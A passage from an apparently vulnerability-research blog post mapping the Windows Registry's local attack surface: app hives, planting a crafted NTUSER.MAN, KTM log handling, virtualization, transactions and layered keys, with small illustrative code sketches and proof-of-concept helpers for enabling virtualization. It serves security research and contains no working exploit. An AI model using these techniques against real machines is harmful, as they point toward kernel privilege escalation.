    • Registry virtualization has introduced further uncertainty into key operations. When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one. Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.
    • Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry. At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.
    • Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units. This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive. Additionally, the semantics of certain objects and their fields have been altered. Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive. Layered keys have disrupted this dependency. Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name.

    Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today. The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together. This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry. This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact. Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft.

    The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below:

    An image from a Pirates of the Caribbean movie shows a standoff with characters pointing pistols at each other. Text labels overlay the scene, metaphorically linking pirate actions to Windows Registry concepts. These concepts include Predefined Keys, Layered Keys, Transactions, Symbolic Links, and Registry Virtualization.

    Some examples of bugs caused by incorrect interactions between these mechanisms include CVE-2023-21675, CVE-2023-21748, CVE-2023-35356, CVE-2023-35357 and CVE-2023-35358.

    Entry points

    This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.

    Hive loading

    Let's start with the operation of loading user-controlled hives. Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length. Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers).

    When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses. It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems. It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.
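
    To make this more concrete, below is a minimal sketch of the kind of header validation that hive loading must perform. The field offsets follow the unofficial regf documentation (libregf/msuhanov); the function is an illustration rather than the kernel's actual implementation, and it omits details such as the format's special-casing of checksum values 0 and 0xFFFFFFFF:

```cpp
#include <cstdint>
#include <cstring>

// Illustrative sanity check of a hive's 512-byte _HBASE_BLOCK header.
// Offsets per the unofficial regf documentation:
//   +0x000 Signature ("regf"), +0x004 Sequence1, +0x008 Sequence2,
//   +0x01C Type, +0x1FC CheckSum (XOR-32 of the preceding 508 bytes).
bool SanityCheckBaseBlock(const uint8_t* data, size_t size) {
  if (size < 512) return false;
  if (memcmp(data, "regf", 4) != 0) return false;

  uint32_t seq1, seq2, checksum;
  memcpy(&seq1, data + 0x004, 4);
  memcpy(&seq2, data + 0x008, 4);
  memcpy(&checksum, data + 0x1FC, 4);

  // Mismatched sequence numbers indicate an interrupted write; the real
  // loader responds by attempting log file recovery, while this sketch
  // simply rejects the file.
  if (seq1 != seq2) return false;

  // The checksum is the XOR of the first 508 bytes, taken as 32-bit words.
  uint32_t computed = 0;
  for (size_t i = 0; i < 0x1FC; i += 4) {
    uint32_t word;
    memcpy(&word, data + i, 4);
    computed ^= word;
  }
  return computed == checksum;
}
```

    Every value read from such a header is attacker-controlled, which is why even bookkeeping fields like these must be treated with suspicion before any deeper parsing takes place.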

    App hives

    The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface. It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators. Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on. In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism.

    It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors:

    • They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy. This special path is additionally protected against being referenced via a fully qualified path, which further reduces the usefulness of app hives in some offensive applications.
    • The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyW API or its corresponding syscall from the NtUnloadKey family.
    • Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurity function or RegCreateKeyExW with a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.
    • KTM transactions are unconditionally blocked for app hives.

    Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs. Even if binary control of the hive is not strictly required, it can still be valuable. This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place. By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.

    User hives and Mandatory User Profiles

    Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\<username>\NTUSER.DAT mounted under \Registry\User\<SID>, or in other words, HKCU) or the user classes hive (C:\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\<SID>_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem.

    The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s), and then log out. User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved.

    The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation). This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal. However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy. Once the NTUSER.MAN file has been created and loaded, there is no way for the same user to delete it, as it will always be loaded by the system upon login, effectively blocking access to it.

    A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633. They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU. Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.

    Log file parsing: .LOG/.LOG1/.LOG2

    One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive. This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded. Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load. Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family.

    Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. Another one is the "incremental log file", a slightly more modern and complex format introduced in Windows 8.1 to address performance issues that plagued the previous version. Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further, at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE").
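
    The distinction between the two formats can be expressed as a small classifier operating on the raw bytes. This is an illustrative sketch based solely on the magic values listed above – real log files obviously require much deeper validation:

```cpp
#include <cstdint>
#include <cstring>
#include <string>

// Rough classification of a registry log file based on the Type field at
// offset 0x1C of the base block and the record signature at offset 0x200.
// Illustrative only; a real parser validates far more than this.
std::string ClassifyLogFile(const uint8_t* data, size_t size) {
  if (size < 0x204 || memcmp(data, "regf", 4) != 0) {
    return "not a hive file";
  }
  uint32_t type, magic;
  memcpy(&type, data + 0x1C, 4);
  memcpy(&magic, data + 0x200, 4);
  if ((type == 0x1 || type == 0x2) && magic == 0x54524944) {  // "DIRT"
    return "legacy log file";
  }
  if (type == 0x6 && magic == 0x454C7648) {                   // "HvLE"
    return "incremental log file";
  }
  return "unknown";
}
```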

    These formats are well documented in two unofficial regf format references on GitHub: libyal/libregf and msuhanov/regf. Additional information can be found in the "Stable storage" and "Incremental logging" subsections of the Windows Internals (Part 2, 7th Edition) book and its earlier editions.

    From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface. On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery. The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.

    Log file parsing: KTM logs

    Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit. These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic.

    KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags. To utilize them, a transaction object must first be created using the CreateTransaction API. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransacted registry functions. Finally, the entire transaction is committed via CommitTransaction. Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again. To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file. When a hive is loaded, the system checks for unapplied changes in these .blf files. If any are found, it deserializes the individual records and attempts to redo all the actions described within them. This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph.

    Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited. The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in. Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled. This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time.

    Historically, the handling of KTM logs has been affected by a significant number of security issues. Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378. Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293. However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since. I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface. Therefore, it could be safely removed or, at the very least, actually fixed.

    Direct registry operations through standard syscalls

    Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel. These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker. These actions have been summarized at the beginning of blog post #2, and should probably be familiar by now. As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall:

    Operation name             | Registry API name(s)                    | System call(s)                                                      | Internal kernel handler (if different than syscall)
    ---------------------------|-----------------------------------------|---------------------------------------------------------------------|----------------------------------------------------
    Load hive                  | RegLoadKey, RegLoadAppKey               | NtLoadKey, NtLoadKey2, NtLoadKeyEx, NtLoadKey3                      | -
    Count open subkeys in hive | -                                       | NtQueryOpenSubKeys                                                  | -
    Flush hive                 | RegFlushKey                             | NtFlushKey                                                          | -
    Open key                   | RegOpenKeyEx, RegOpenKeyTransacted      | NtOpenKey, NtOpenKeyEx, NtOpenKeyTransacted, NtOpenKeyTransactedEx  | CmpParseKey
    Create key                 | RegCreateKeyEx, RegCreateKeyTransacted  | NtCreateKey, NtCreateKeyTransacted                                  | CmpParseKey
    Delete key                 | RegDeleteKeyEx, RegDeleteKeyTransacted  | NtDeleteKey                                                         | -
    Rename key                 | RegRenameKey                            | NtRenameKey                                                         | -
    Set key security           | RegSetKeySecurity                       | NtSetSecurityObject                                                 | CmpSecurityMethod
    Query key security         | RegGetKeySecurity                       | NtQuerySecurityObject                                               | CmpSecurityMethod
    Set key information        | -                                       | NtSetInformationKey                                                 | -
    Query key information      | RegQueryInfoKey                         | NtQueryKey                                                          | -
    Enumerate subkeys          | RegEnumKeyEx                            | NtEnumerateKey                                                      | -
    Notify on key change       | RegNotifyChangeKeyValue                 | NtNotifyChangeKey, NtNotifyChangeMultipleKeys                       | -
    Query key path             | -                                       | NtQueryObject                                                       | CmpQueryKeyName
    Close key handle           | RegCloseKey                             | NtClose                                                             | CmpCloseKeyObject, CmpDeleteKeyObject
    Set value                  | RegSetValueEx                           | NtSetValueKey                                                       | -
    Delete value               | RegDeleteValue                          | NtDeleteValueKey                                                    | -
    Enumerate values           | RegEnumValue                            | NtEnumerateValueKey                                                 | -
    Query value data           | RegQueryValueEx                         | NtQueryValueKey                                                     | -
    Query multiple values      | RegQueryMultipleValues                  | NtQueryMultipleValueKey                                             | -

    Some additional comments:

    • A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag. Loading standard hives, using the RegLoadKey function, is reserved for administrators only. However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.
    • When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended"). I also chose those that are the thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side. In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey). Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.
    • There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey. The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library. Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call. For example, the RegQueryInfoKey function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes.

    Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode). These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups). They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:

    • NtCompactKeys
    • NtCompressKey
    • NtFreezeRegistry
    • NtInitializeRegistry
    • NtLockRegistryKey
    • NtQueryOpenSubKeysEx
    • NtReplaceKey
    • NtRestoreKey
    • NtSaveKey
    • NtSaveKeyEx
    • NtSaveMergedKeys
    • NtThawRegistry
    • NtUnloadKey
    • NtUnloadKey2
    • NtUnloadKeyEx

    Incorporating advanced features

    Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs. To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive. When this is done, the information about the special key properties is encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application. When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user. The diagram below illustrates the general, conceptual control flow in registry-related system calls:

    A flowchart outlines a system process beginning with input argument checks and referencing key handles. An internal operation handler then makes decisions based on whether a key is layered or transacted, leading to specific logic paths. The process concludes with copying output data and invoking post registry callbacks before stopping.

    This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors. In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one. For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them. On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important. As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on.

    In the following sections, we will take a closer look at each of the possible complications.

    Predefined keys and symbolic links

    Predefined keys were deprecated in 2023, so I won't spend much time on them here. It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls. The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive. These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type). Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check. As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system.

    When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them. Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters. From that point on, the link points to the specified path. However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user). As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel.
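
    The last restriction boils down to a prefix check on the link target. A simplified, conceptual model of it is shown below – the actual kernel code operates on UNICODE_STRING paths and handles component boundaries, which this sketch glosses over:

```cpp
#include <cctype>
#include <string>

// Conceptual model of the policy that symbolic link targets pointing into
// the app hive namespace (\Registry\A) are rejected. Registry paths are
// case-insensitive, hence the character-by-character toupper() comparison.
bool IsSymlinkTargetBlocked(const std::string& target) {
  static const std::string kPrefix = "\\Registry\\A";
  if (target.size() < kPrefix.size()) {
    return false;
  }
  for (size_t i = 0; i < kPrefix.size(); ++i) {
    if (std::toupper((unsigned char)target[i]) !=
        std::toupper((unsigned char)kPrefix[i])) {
      return false;
    }
  }
  return true;
}
```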

    As for auditing symbolic links, they are generally resolved during the opening/creation of a key. Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.

    Registry virtualization

    Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry. This mechanism redirects references between HKLM\Software and HKU\<SID>_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it. The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions:

    • CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations. This is done to merge the properties of both keys into a single state that is then returned to the caller.
    • CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.
    • CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore.
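
    As a rough illustration of the redirection performed by these routines, the path translation can be sketched as follows. The VirtualStore layout used here (MACHINE\SOFTWARE under the user classes hive) reflects the documented behavior of registry virtualization, but the helper itself is hypothetical and ignores details such as case-insensitive matching:

```cpp
#include <string>

// Hypothetical sketch of the HKLM\Software -> VirtualStore path remapping;
// the real logic in the CmKeyBodyRemapToVirtual* functions is considerably
// more involved. "sid" stands for the calling user's SID string.
std::string RemapToVirtualStore(const std::string& realPath,
                                const std::string& sid) {
  const std::string kPrefix = "\\Registry\\Machine\\Software";
  if (realPath.compare(0, kPrefix.size(), kPrefix) != 0) {
    return realPath;  // not subject to virtualization in this sketch
  }
  return "\\Registry\\User\\" + sid +
         "_Classes\\VirtualStore\\MACHINE\\SOFTWARE" +
         realPath.substr(kPrefix.size());
}
```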

    All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met:

    • Virtualization must be specifically enabled for a given process. This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.
    • Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.
    • The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key. This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.
    • In specific cases, the source key must be located in a virtualizable hive. In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it.

    With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker. These reports include proof-of-concept code that correctly sets the appropriate flags. For simplicity, I will share that code here as well; the two C++ functions responsible for enabling virtualization for a given security token and registry key are shown below:

    BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {
      DWORD dwVirtualizationEnabled = bEnabled;
      return SetTokenInformation(hToken,
                                 TokenVirtualizationEnabled,
                                 &dwVirtualizationEnabled,
                                 sizeof(dwVirtualizationEnabled));
    }

    BOOL EnableKeyVirtualization(HKEY hKey,
                                 BOOL VirtualTarget,
                                 BOOL VirtualStore,
                                 BOOL VirtualSource) {
      KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;
      VirtInfo.VirtualTarget = VirtualTarget;
      VirtInfo.VirtualStore = VirtualStore;
      VirtInfo.VirtualSource = VirtualSource;
      VirtInfo.Reserved = 0;
      NTSTATUS Status = NtSetInformationKey(hKey,
                                            KeySetVirtualizationInformation,
                                            &VirtInfo,
                                            sizeof(VirtInfo));
      return NT_SUCCESS(Status);
    }


    And their example use:

    HANDLE hToken;
    HKEY hKey;

    //
    // Enable virtualization for the token.
    //
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
      printf("OpenProcessToken failed with error %u\n", GetLastError());
      return 1;
    }
    EnableTokenVirtualization(hToken, TRUE);

    //
    // Enable virtualization for the key.
    //
    RegOpenKeyExW(..., &hKey);
    EnableKeyVirtualization(hKey,
                            /*VirtualTarget=*/TRUE,
                            /*VirtualStore=*/TRUE,
                            /*VirtualSource=*/FALSE);

    Transactions

    There are two types of registry transactions: KTM and lightweight. The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically. From an attacker's perspective, three parts of the interface are of most interest: creating a transaction object, rolling back a transaction, and committing a transaction. The functions responsible for all three actions in each type of transaction are shown in the table below:

    Operation            | KTM (API)           | KTM (system call)     | Lightweight (API) | Lightweight (system call)
    ---------------------|---------------------|-----------------------|-------------------|------------------------------
    Create transaction   | CreateTransaction   | NtCreateTransaction   | -                 | NtCreateRegistryTransaction
    Rollback transaction | RollbackTransaction | NtRollbackTransaction | -                 | NtRollbackRegistryTransaction
    Commit transaction   | CommitTransaction   | NtCommitTransaction   | -                 | NtCommitRegistryTransaction

    As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls. Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes:

    NTSTATUS NtCreateRegistryTransaction(PHANDLE OutputHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG Reserved);
    NTSTATUS NtRollbackRegistryTransaction(HANDLE Handle, ULONG Reserved);
    NTSTATUS NtCommitRegistryTransaction(HANDLE Handle, ULONG Reserved);


    Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward. The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle. The key's internal properties, specifically the key body structure, will reflect its transactional nature. Operations on this key proceed identically to the non-transactional case, using the same functions. However, changes are temporarily confined to the transaction context, isolated from the global registry view. Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit. From the developer's perspective, this interface is undeniably convenient.

    From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality. Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction. Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified.

    But that's not the end of the story. The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design. In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them. It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet. This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible. The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW). These are the two main families of functions that are most interesting from a vulnerability research perspective. In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage. This part is mainly handled by the CmpTransMgrFreeVolatileData function.

    Layered keys

    Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive. A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack. In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:

    • Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.
    • Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".
    • Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level. This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.
    • Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first.
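The core resolution rule behind all of the above can be captured in a small hypothetical model (the enum and function names below are invented for illustration, and the real kernel works with key node stacks and KCB stacks rather than a flat array): a key's logical existence is decided by the first non-absent entry found when scanning the layer stack from the top down, with a tombstone masking everything beneath it:

```c
#include <assert.h>
#include <stddef.h>

// Hypothetical model of logical key resolution across a layered-key stack.
// Index 0 is the topmost differencing hive; the last index is the base hive.
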